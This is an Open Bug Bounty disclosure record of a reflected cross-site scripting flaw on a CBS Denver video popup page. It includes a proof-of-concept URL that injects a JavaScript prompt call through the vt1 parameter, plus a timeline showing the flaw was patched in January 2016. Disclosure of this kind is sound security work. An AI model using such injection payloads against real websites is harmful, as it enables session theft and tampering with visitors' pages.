video.denver.cbslocal.com XSS vulnerability

2015-09-24T10:09:00
ID OBB:88572
Type openbugbounty
Reporter nopernik
Modified 2016-01-30T22:55:00

Description

Vulnerable URL:
http://video.denver.cbslocal.com/global/video/flash/popupplayer.asp?vt1=v%22-prompt%28/xssposed/%29-%22&clipFormat;=flv&clipId1;=5439595&at1;=News&h1;=Teens%20Face%20Charges%20In%20String%20Of%20Vandalism%20Cases%20In%20Longmont&flvUri;=&partnerclipid;=&rnd;=55386210
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:55 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check video.denver.cbslocal.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 24 September, 2015 10:09 GMT
Vulnerability existence verified and confirmed| 24 September, 2015 10:12 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:55 GMT